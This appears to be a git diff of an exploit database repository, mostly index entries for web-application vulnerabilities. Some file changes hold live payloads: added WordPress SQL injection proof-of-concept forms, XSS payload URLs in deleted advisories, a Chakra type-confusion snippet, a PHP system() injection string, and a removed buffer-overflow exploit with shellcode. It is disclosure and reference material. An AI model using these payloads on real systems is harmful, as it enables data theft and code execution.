6903,platforms/php/webapps/6903.txt,"SFS EZ HotScripts-like Site - 'cid' SQL Injection",2008-10-31,TR-ShaRk,php,webapps,0
6904,platforms/php/webapps/6904.txt,"Absolute NewsLetter 6.1 - Insecure Cookie Handling",2008-10-31,x0r,php,webapps,0
6905,platforms/php/webapps/6905.txt,"SFS EZ Hosting Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0
6906,platforms/php/webapps/6906.txt,"SFS EZ Gaming Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0
6906,platforms/php/webapps/6906.txt,"SFS EZ Gaming Directory - 'cat_id' Parameter SQL Injection",2008-10-31,BeyazKurt,php,webapps,0
6907,platforms/php/webapps/6907.txt,"SFS EZ Home Business Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0
6908,platforms/php/webapps/6908.txt,"SFS EZ Link Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0
6909,platforms/php/webapps/6909.txt,"Adult Banner Exchange Website - (targetid) SQL Injection",2008-10-31,"Hussin X",php,webapps,0
@ -23038,7 +23038,7 @@ id,file,description,date,author,platform,type,port
12619,platforms/php/webapps/12619.txt,"Cybertek CMS - Local File Inclusion",2010-05-16,XroGuE,php,webapps,0
12620,platforms/php/webapps/12620.txt,"The iceberg - 'Content Management System' SQL Injection",2010-05-16,cyberlog,php,webapps,0
12623,platforms/php/webapps/12623.txt,"Joomla! Component 'com_simpledownload' 0.9.5 - Local File Disclosure",2010-05-16,ALTBTA,php,webapps,0
12624,platforms/php/webapps/12624.txt,"LinPHA 1.3.2 - (rotate.php) Remote Command Execution",2010-05-16,"Sn!pEr.S!Te Hacker",php,webapps,0
12624,platforms/php/webapps/12624.txt,"LinPHA 1.3.2 - 'rotate.php' Remote Command Execution",2010-05-16,"Sn!pEr.S!Te Hacker",php,webapps,0
12628,platforms/php/webapps/12628.txt,"EgO 0.7b - 'FCKeditor' Arbitrary File Upload",2010-05-16,ITSecTeam,php,webapps,0
12629,platforms/php/webapps/12629.txt,"Tainos - Multiple Vulnerabilities",2010-05-16,XroGuE,php,webapps,0
12630,platforms/php/webapps/12630.txt,"I-Vision CMS - Cross-Site Scripting / SQL Injection",2010-05-16,Ariko-Security,php,webapps,0
@ -25553,7 +25553,7 @@ id,file,description,date,author,platform,type,port
20981,platforms/php/webapps/20981.txt,"SugarCRM Community Edition 6.5.2 (Build 8410) - Multiple Vulnerabilities",2012-09-01,"Brendan Coles",php,webapps,0
20983,platforms/php/webapps/20983.pl,"Joomla! Component 'com_spidercalendar' - SQL Injection",2012-09-01,D4NB4R,php,webapps,0
20987,platforms/asp/webapps/20987.txt,"Citrix Nfuse 1.51 - Webroot Disclosure",2001-07-02,sween,asp,webapps,0
20995,platforms/php/webapps/20995.txt,"cobalt qube webmail 1.0 - Directory Traversal",2001-07-05,kf,php,webapps,0
20995,platforms/php/webapps/20995.txt,"Cobalt Qube Webmail 1.0 - Directory Traversal",2001-07-05,kf,php,webapps,0
20996,platforms/php/webapps/20996.txt,"Basilix Webmail 1.0 - File Disclosure",2001-07-06,"karol _",php,webapps,0
21005,platforms/php/webapps/21005.txt,"admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps,0
21007,platforms/php/webapps/21007.txt,"AV Arcade Free Edition - 'add_rating.php id Parameter' Blind SQL Injection",2012-09-02,DaOne,php,webapps,0
@ -28728,10 +28728,10 @@ id,file,description,date,author,platform,type,port
27188,platforms/ios/webapps/27188.txt,"Private Photos 1.0 iOS - Persistent Cross-Site Scripting",2013-07-29,Vulnerability-Lab,ios,webapps,0
27189,platforms/ios/webapps/27189.txt,"WebDisk 3.0.2 PhotoViewer iOS - Command Execution",2013-07-29,Vulnerability-Lab,ios,webapps,0
27190,platforms/php/webapps/27190.txt,"FluxBB 1.5.3 - Multiple Vulnerabilities",2013-07-29,LiquidWorm,php,webapps,0
27192,platforms/php/webapps/27192.txt,"LinPHA 0.9.x/1.0 - 'index.php' lang Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0
27193,platforms/php/webapps/27193.txt,"LinPHA 0.9.x/1.0 - install.php language Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0
27194,platforms/php/webapps/27194.txt,"LinPHA 0.9.x/1.0 - sec_stage_install.php language Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0
27195,platforms/php/webapps/27195.txt,"LinPHA 0.9.x/1.0 - forth_stage_install.php language Variable POST Method Local File Inclusion",2006-02-11,rgod,php,webapps,0
27192,platforms/php/webapps/27192.txt,"LinPHA 0.9.x/1.0 - 'lang' Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0
27193,platforms/php/webapps/27193.txt,"LinPHA 0.9.x/1.0 - 'install.php' Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0
27194,platforms/php/webapps/27194.txt,"LinPHA 0.9.x/1.0 - 'sec_stage_install.php' Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0
27195,platforms/php/webapps/27195.txt,"LinPHA 0.9.x/1.0 - 'forth_stage_install.php' Local File Inclusion",2006-02-11,rgod,php,webapps,0
27197,platforms/php/webapps/27197.txt,"ImageVue 0.16.1 - dir.php Folder Permission Disclosure",2006-02-11,zjieb,php,webapps,0
27198,platforms/php/webapps/27198.txt,"ImageVue 0.16.1 - readfolder.php path Variable Arbitrary Directory Listing",2006-02-11,zjieb,php,webapps,0
27199,platforms/php/webapps/27199.txt,"ImageVue 0.16.1 - 'index.php' bgcol Parameter Cross-Site Scripting",2006-02-11,zjieb,php,webapps,0
@ -29078,7 +29078,6 @@ id,file,description,date,author,platform,type,port
27666,platforms/php/webapps/27666.txt,"Manila 9.0.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-17,"Aaron Kaplan",php,webapps,0
27667,platforms/php/webapps/27667.txt,"MyBB 1.1 - Global Variable Overwrite",2006-04-17,imei,php,webapps,0
27669,platforms/php/webapps/27669.txt,"Coppermine 1.4.4 - 'index.php' Local File Inclusion",2006-04-17,imei,php,webapps,0
27671,platforms/php/webapps/27671.txt,"LinPHA 1.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-18,d4igoro,php,webapps,0
27672,platforms/cgi/webapps/27672.txt,"axoverzicht.CGI - Cross-Site Scripting",2006-04-18,Qex,cgi,webapps,0
27673,platforms/php/webapps/27673.txt,"PHPLinks 2.1.2/2.1.3 - 'index.php' Cross-Site Scripting",2006-04-18,r0t,php,webapps,0
27674,platforms/php/webapps/27674.txt,"RechnungsZentrale 2 1.1.3 - Authent.php4 SQL Injection",2006-04-18,"GroundZero Security",php,webapps,0
@ -30006,7 +30005,6 @@ id,file,description,date,author,platform,type,port
28963,platforms/php/webapps/28963.txt,"Bitweaver 1.x - fisheye/index.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0
28964,platforms/php/webapps/28964.txt,"Bitweaver 1.x - wiki/orphan_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0
28965,platforms/php/webapps/28965.txt,"Bitweaver 1.x - wiki/list_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0
28966,platforms/php/webapps/28966.txt,"Drake CMS 0.2 - 'index.php' Cross-Site Scripting",2006-11-10,CorryL,php,webapps,0
28967,platforms/php/webapps/28967.txt,"ExoPHPDesk 1.2 - Pipe.php Remote File Inclusion",2006-11-11,Firewall1954,php,webapps,0
28970,platforms/php/webapps/28970.txt,"WordPress Plugin Dexs PM System - Authenticated Persistent Cross-Site Scripting",2013-10-15,TheXero,php,webapps,80
28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - (exportcsv.php sondage Parameter) SQL Injection",2013-10-15,drone,php,webapps,80
@ -30391,7 +30389,6 @@ id,file,description,date,author,platform,type,port
29491,platforms/php/webapps/29491.txt,"MyBloggie 2.1.5 - 'index.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
40368,platforms/cgi/webapps/40368.sh,"Inteno EG101R1 VoIP Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
29492,platforms/php/webapps/29492.txt,"MyBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
29495,platforms/php/webapps/29495.txt,"Sabros.US 1.7 - 'index.php' Cross-Site Scripting",2007-01-18,CorryL,php,webapps,0
29497,platforms/php/webapps/29497.txt,"Easebay Resources Paypal Subscription - Manager Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0
29498,platforms/php/webapps/29498.txt,"Easebay Resources Login Manager - Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0
29499,platforms/php/webapps/29499.txt,"SMF 1.1 - 'index.php' HTML Injection",2007-01-20,"Aria-Security Team",php,webapps,0
@ -30664,7 +30661,7 @@ id,file,description,date,author,platform,type,port
29796,platforms/hardware/webapps/29796.pl,"Pirelli Discus DRG A125g - Remote Change WiFi Password",2013-11-24,"Sebastián Magof",hardware,webapps,0
29797,platforms/php/webapps/29797.txt,"MyBB Ajaxfs 2 Plugin - SQL Injection",2013-11-24,"IeDb ir",php,webapps,0
29802,platforms/hardware/webapps/29802.txt,"TP-Link WR740N/WR740ND - Multiple Cross-Site Request Forgery Vulnerabilities",2013-11-25,"Samandeep Singh",hardware,webapps,0
29805,platforms/php/webapps/29805.txt,"Drake CMS 0.3.7 - 404.php Local File Inclusion",2007-03-30,"HACKERS PAL",php,webapps,0
29805,platforms/php/webapps/29805.txt,"Drake CMS 0.3.7 - '404.php' Local File Inclusion",2007-03-30,"HACKERS PAL",php,webapps,0
29806,platforms/php/webapps/29806.pl,"PHP-Fusion 6.1.5 - Calendar_Panel Module Show_Event.php SQL Injection",2007-03-31,UNIQUE-KEY,php,webapps,0
29817,platforms/asp/webapps/29817.txt,"Gazi Okul Sitesi 2007 - Fotokategori.asp SQL Injection",2007-04-04,CoNqUeRoR,asp,webapps,0
29821,platforms/php/webapps/29821.txt,"Livor 2.5 - 'index.php' Cross-Site Scripting",2007-04-06,"Arham Muhammad",php,webapps,0
@ -31347,7 +31344,6 @@ id,file,description,date,author,platform,type,port
31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products - Remote Information Disclosure",2008-01-23,AmnPardaz,asp,webapps,0
31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts - 'user_login.asp' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0
31059,platforms/asp/webapps/31059.txt,"E-Smart Cart - 'Members Login' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0
31060,platforms/php/webapps/31060.txt,"Drake CMS 0.4.9 - 'index.php' Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
31061,platforms/php/webapps/31061.txt,"Trixbox 2.4.2 - user/index.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
31062,platforms/php/webapps/31062.txt,"Trixbox 2.4.2 - maint/index.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
31063,platforms/php/webapps/31063.txt,"WebCalendar 1.1.6 - pref.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
@ -31756,7 +31752,6 @@ id,file,description,date,author,platform,type,port
31653,platforms/php/webapps/31653.txt,"amfPHP 1.2 - browser/details class Parameter Cross-Site Scripting",2008-04-15,"Alberto Cuesta Partida",php,webapps,0
31654,platforms/php/webapps/31654.txt,"W2B Online Banking - 'ilang' Parameter Remote File Inclusion",2008-04-15,THuM4N,php,webapps,0
31655,platforms/php/webapps/31655.txt,"Istant-Replay - 'read.php' Remote File Inclusion",2008-04-15,THuGM4N,php,webapps,0
31657,platforms/php/webapps/31657.txt,"Blogator-script 0.95 - 'bs_auth.php' Cross-Site Scripting",2008-04-16,ZoRLu,php,webapps,0
31658,platforms/php/webapps/31658.txt,"MyBoard 1.0.12 - 'rep.php' Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0
31659,platforms/php/webapps/31659.txt,"PHP-Stats 0.1.9.1 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-17,ZoRLu,php,webapps,0
31660,platforms/php/webapps/31660.txt,"EsContacts 1.0 - add_groupe.php msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0
@ -31765,7 +31760,7 @@ id,file,description,date,author,platform,type,port
31663,platforms/php/webapps/31663.txt,"EsContacts 1.0 - importer.php msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0
31664,platforms/php/webapps/31664.txt,"EsContacts 1.0 - 'login.php' msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0
31665,platforms/php/webapps/31665.txt,"EsContacts 1.0 - search.php msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0
31666,platforms/asp/webapps/31666.txt,"CoBaLT 2.0 - 'adminler.asp' SQL Injection",2008-04-17,U238,asp,webapps,0
31666,platforms/asp/webapps/31666.txt,"Cobalt 2.0 - 'adminler.asp' SQL Injection",2008-04-17,U238,asp,webapps,0
31668,platforms/php/webapps/31668.txt,"TLM CMS 3.1 - Multiple SQL Injections",2008-04-18,ZoRLu,php,webapps,0
31669,platforms/php/webapps/31669.txt,"Wikepage Opus 13 2007.2 - 'wiki' Parameter Cross-Site Scripting",2008-04-18,"Gerendi Sandor Attila",php,webapps,0
31670,platforms/php/webapps/31670.txt,"WordPress 2.3.3 - 'cat' Parameter Directory Traversal",2008-04-18,"Gerendi Sandor Attila",php,webapps,0
@ -32060,7 +32055,6 @@ id,file,description,date,author,platform,type,port
32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 - config.php bbPath[root_theme] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
32101,platforms/php/webapps/32101.txt,"eSyndiCat 1.6 - 'admin_lng' Cookie Parameter Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0
32102,platforms/php/webapps/32102.txt,"AlphAdmin CMS 1.0.5_03 - 'aa_login' Cookie Parameter Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0
32103,platforms/php/webapps/32103.txt,"VisualPic 0.3.1 - Cross-Site Scripting",2008-07-21,Ciph3r,php,webapps,0
32106,platforms/php/webapps/32106.txt,"Claroline 1.8 - learnPath/calendar/myagenda.php Query String Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0
32107,platforms/php/webapps/32107.txt,"Claroline 1.8 - user/user.php Query String Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0
32108,platforms/php/webapps/32108.txt,"Claroline 1.8 - tracking/courseLog.php view Parameter Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0
@ -32528,8 +32522,6 @@ id,file,description,date,author,platform,type,port
32897,platforms/java/webapps/32897.txt,"Cisco Subscriber Edge Services Manager - Cross-Site Scripting / HTML Injection",2009-04-09,"Usman Saeed",java,webapps,0
32898,platforms/asp/webapps/32898.txt,"XIGLA Absolute Form Processor XE 1.5 - 'login.asp' SQL Injection",2009-04-09,"ThE g0bL!N",asp,webapps,0
32903,platforms/asp/webapps/32903.txt,"People-Trak - Login SQL Injection",2009-04-13,Mormoroth.net,asp,webapps,0
32905,platforms/php/webapps/32905.txt,"LinPHA 1.3.2/1.3.3 - 'login.php' Cross-Site Scripting",2009-04-09,"Gerendi Sandor Attila",php,webapps,0
32906,platforms/php/webapps/32906.txt,"LinPHA 1.3.2/1.3.3 - new_images.php Cross-Site Scripting",2009-04-09,"Gerendi Sandor Attila",php,webapps,0
32907,platforms/cgi/webapps/32907.txt,"Banshee 1.4.2 DAAP Extension - 'apps/web/vs_diag.cgi' Cross-Site Scripting",2009-04-13,"Anthony de Almeida Lopes",cgi,webapps,0
32908,platforms/multiple/webapps/32908.txt,"IBM Tivoli Continuous Data Protection for Files 3.1.4.0 - Cross-Site Scripting",2009-04-14,"Abdul-Aziz Hariri",multiple,webapps,0
32909,platforms/java/webapps/32909.txt,"Novell Teaming 1.0 - User Enumeration Weakness / Multiple Cross-Site Scripting Vulnerabilities",2009-04-15,"Michael Kirchner",java,webapps,0
@ -33145,7 +33137,6 @@ id,file,description,date,author,platform,type,port
34095,platforms/php/webapps/34095.txt,"PonVFTP - 'login.php' SQL Injection",2010-01-15,S2K9,php,webapps,0
34096,platforms/php/webapps/34096.txt,"CuteSITE CMS 1.x - manage/add_user.php user_id Parameter SQL Injection",2010-06-06,"High-Tech Bridge SA",php,webapps,0
34097,platforms/php/webapps/34097.txt,"CuteSITE CMS 1.x - manage/main.php fld_path Parameter Cross-Site Scripting",2010-06-06,"High-Tech Bridge SA",php,webapps,0
34154,platforms/php/webapps/34154.txt,"Software Index - 'signinform.php' Cross-Site Scripting",2010-06-27,indoushka,php,webapps,0
34155,platforms/php/webapps/34155.txt,"Ceica-GW - 'login.php' Cross-Site Scripting",2010-06-27,indoushka,php,webapps,0
34157,platforms/php/webapps/34157.txt,"Firebook - Multiple Cross-Site Scripting / Directory Traversal Vulnerabilities",2010-06-17,MustLive,php,webapps,0
34116,platforms/php/webapps/34116.txt,"Bits Video Script 2.05 Gold Beta - showcasesearch.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0
@ -36262,7 +36253,7 @@ id,file,description,date,author,platform,type,port
39269,platforms/php/webapps/39269.txt,"WordPress Plugin Lead Octopus Power - 'id' Parameter SQL Injection",2014-07-28,Amirh03in,php,webapps,0
39270,platforms/php/webapps/39270.txt,"WordPress Plugin WhyDoWork AdSense - options-general.php Cross-Site Request Forgery (Option Manipulation)",2014-07-28,"Dylan Irzi",php,webapps,0
39271,platforms/php/webapps/39271.txt,"CMSimple - Default Administrator Credentials",2014-07-28,"Govind Singh",php,webapps,0
39272,platforms/php/webapps/39272.txt,"CMSimple 4.4.4 - Remote file Inclusion",2014-07-28,"Govind Singh",php,webapps,0
39272,platforms/php/webapps/39272.txt,"CMSimple 4.4.4 - Remote File Inclusion",2014-07-28,"Govind Singh",php,webapps,0
39273,platforms/php/webapps/39273.txt,"CMSimple - /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0
39279,platforms/php/webapps/39279.txt,"WordPress Plugin wpSS - 'ss_handler.php' SQL Injection",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0
39280,platforms/php/webapps/39280.txt,"WordPress Plugin HDW Player - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0
@ -36784,3 +36775,5 @@ id,file,description,date,author,platform,type,port
40753,platforms/php/webapps/40753.php,"Schoolhos CMS 2.29 - Remote Code Execution / SQL Injection",2016-11-13,0x4148,php,webapps,0
40755,platforms/php/webapps/40755.html,"ATutor 2.2.2 - Cross-Site Request Forgery (Add New Course)",2016-11-13,"Saravana Kumar",php,webapps,0
40756,platforms/php/webapps/40756.py,"Boonex Dolphin 7.3.2 - Authentication Bypass / Remote Code Execution",2016-11-14,0x4148,php,webapps,0
40771,platforms/php/webapps/40771.txt,"Wordpress Plugin Answer My Question 1.3 - SQL Injection",2016-11-17,"Lenon Leite",php,webapps,0
40772,platforms/php/webapps/40772.txt,"Wordpress Plugin Sirv 1.3.1 - SQL Injection",2016-11-17,"Lenon Leite",php,webapps,0

Can't render this file because it is too large.

View file

@ -1,4 +1,4 @@
source: http://www.securityfocus.com/bid/45211/discuss
source: http://www.securityfocus.com/bid/45211/info
Real Estate Single is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

View file

@ -1,4 +1,4 @@
source: http://www.securityfocus.com/bid/45212/discuss
source: http://www.securityfocus.com/bid/45212/info
Multi Agent System is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

File diff suppressed because it is too large Load diff

View file

@ -1,4 +1,4 @@
source: http://www.securityfocus.com/bid/68
source: http://www.securityfocus.com/bid/68/info
http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info

View file

@ -1,4 +1,4 @@
source: http://www.securityfocus.com/bid/68
source: http://www.securityfocus.com/bid/68/info
http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info

View file

@ -1,11 +0,0 @@
source: http://www.securityfocus.com/bid/17581/info
LinPHA is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
LinPHA 1.1.0 is reported vulnerable. Other versions may be affected as well.
http://www.example.com/plugins/stats/stats_view.php?date_from=[XSS]
http://www.example.com/plugins/stats/stats_view.php?date_to=[XSS]
http://www.example.com/plugins/stats/stats_view.php?date=[XSS]

View file

@ -1,11 +0,0 @@
source: http://www.securityfocus.com/bid/20998/info
Drake CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Version 0.2 is vulnerable; other versions may also be affected.
NOTE: This BID is being retired because reports indicate that this issue is not exploitable.
http://www.example.com//index.php?option=contact&Itemid=10&task=category&id=<ScRiPt%20%0a%0d>alert(764606807)%3B</ScRiPt>

View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/22115/info
The 'sabros.us' application is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/index.php?tag=</title><script>alert(document.cookie)</script>

View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/27459/info
Drake CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Drake CMS 0.4.9 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/index.php?option="'><IFRAME%20SRC="javascript:alert('XSS');"></IFRAME>&Itemid=12

View file

@ -1,11 +0,0 @@
source: http://www.securityfocus.com/bid/28810/info
Blogator-script is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Blogator-script 0.95 is affected; other versions may also be vulnerable.
http://www.example.com/BS0.95/Blogator-script/bs_auth.php?msg=[XSS]

View file

@ -1,11 +0,0 @@
source: http://www.securityfocus.com/bid/30334/info
VisualPic is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
VisualPic 0.3.1 is vulnerable; other versions may be affected as well.
http://www.example.com/visualpic/?login&pic=>"><script>alert("XSS")</script>
http://www.example.com/visualpic/?pic=%00'"><script>alert("XSS")</script>
http://www.example.com/visualpic/?login&pic=>"><script>alert("XSS")</script>

View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/34500/info
LinPHA is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
Attackers can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help attackers steal cookie-based authentication credentials and launch other attacks.
Versions prior to LinPHA 1.3.4 are vulnerable.
http://www.example.com/linpha-1.3.2/login.php?ref=&#039;><script>alert(1)</ScRiPt>

View file

@ -1,10 +0,0 @@
source: http://www.securityfocus.com/bid/34500/info
LinPHA is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
Attackers can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help attackers steal cookie-based authentication credentials and launch other attacks.
Versions prior to LinPHA 1.3.4 are vulnerable.
http://www.example.com/test/linpha-1.3.2/new_images.php?order=%22%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/test/linpha-1.3.2/new_images.php?pn=%22%3Cscript%3Ealert(1)%3C/script%3E

View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/40914/info
Software Index is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/signinform.php?msg=/"><marquee><font%20color=gren%20size=30>indoushka</font></marquee>

31
platforms/php/webapps/40771.txt Executable file
View file

@ -0,0 +1,31 @@
# Exploit Title: Answer My Question 1.3 Plugin for WordPress Sql Injection
# Date: 10/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/answer-my-question/
# Software Link: https://wordpress.org/plugins/answer-my-question/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.3
# Tested on: Windows 8.1
1 - Description
$_POST['id'] is not escaped. Url is accessible for any user.
http://lenonleite.com.br/en/blog/2016/11/11/answer-my-question-1-3-plugin-for-wordpress-sql-injection/
2 - Proof of Concept
<form method="post" action="http://localhost:1406/wp/wp-content/plugins/answer-my-question/modal.php">
<input type="text" name="id" value="0 UNION SELECT 1,2,3,4,5,6,slug,term_group,name,10,11,12 FROM wp_terms WHERE term_id=1">
<input type="submit" value="Send">
</form>
3. Solution
--
Atenciosamente
Lenon Leite

37
platforms/php/webapps/40772.txt Executable file
View file

@ -0,0 +1,37 @@
# Exploit Title: Sirv 1.3.1 Plugin For WordPress Sql Injection
# Date: 10/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/sirv/
# Software Link: https://wordpress.org/plugins/sirv/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.3.1
# Tested on: Windows 8.1
1 - Description
$_POST[ id ] is not escaped. sirv_get_row_by_id() is accessible for every
registered user.
http://lenonleite.com.br/en/blog/2016/11/10/sirv-1-3-1-plugin-for-wordpress/
2. Proof of Concept
Login as regular user.
<form method="post" action="http://target/wp-admin/admin-ajax.php">
<input type="text" name="row_id" value="0 UNION SELECT 1, name,slug, term_group, 6, 7, 8, 9, 10, 11, 12 FROM wp_terms WHERE term_id=1">
<input type="text" name="action" value="sirv_get_row_by_id">
<input type="submit" value="Send">
</form>
3. Solution:
Update to version 1.3.2
--
Atenciosamente
Lenon Leite

View file

@ -65,7 +65,7 @@
408. for example:
409. User <?php echo system($_GET['cwd']); ?>: login failed! <== oops! ;)
410. will be replaced by:
411. User &lt;?php echo system($_GET[&#039;cwd&#039;]); ?&gt;: login failed!
411. User <?php echo system($_GET[&#039;cwd&#039;]); ?>: login failed!
*/

View file

@ -0,0 +1,17 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=948
In Chakra, function calls can sometimes take an extra internal argument, using the flag CallFlags_ExtraArg. The global eval function makes assumptions about the type of this extra arg, and casts it to a FrameDisplay object. If eval is called from a location in code where an extra parameter is added, for example, a Proxy function trap, and the extra parameter is of a different type, this can lead to type confusion. A full PoC is as follows and attached:
var p = new Proxy(eval, {});
p("alert(\"e\")");
-->
<html>
<body>
<script>
var p = new Proxy(eval, {});
p("alert(\"e\")");
</script>
</body>
</html>

View file

@ -1,111 +0,0 @@
#usage: exploit.py
print "-----------------------------------------------------------------------"
print ' [PoC 2] MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling BoF\n'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org\n"
print " Once you create the file, open it with Visual Basic 6 and click on"
print " command name."
print "-----------------------------------------------------------------------"
buff = "A" * 555
get_EIP = "\xFF\xBE\x3F\x7E" #call ESP from user32.dll
nop = "\x90" * 12
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"
"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"
"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"
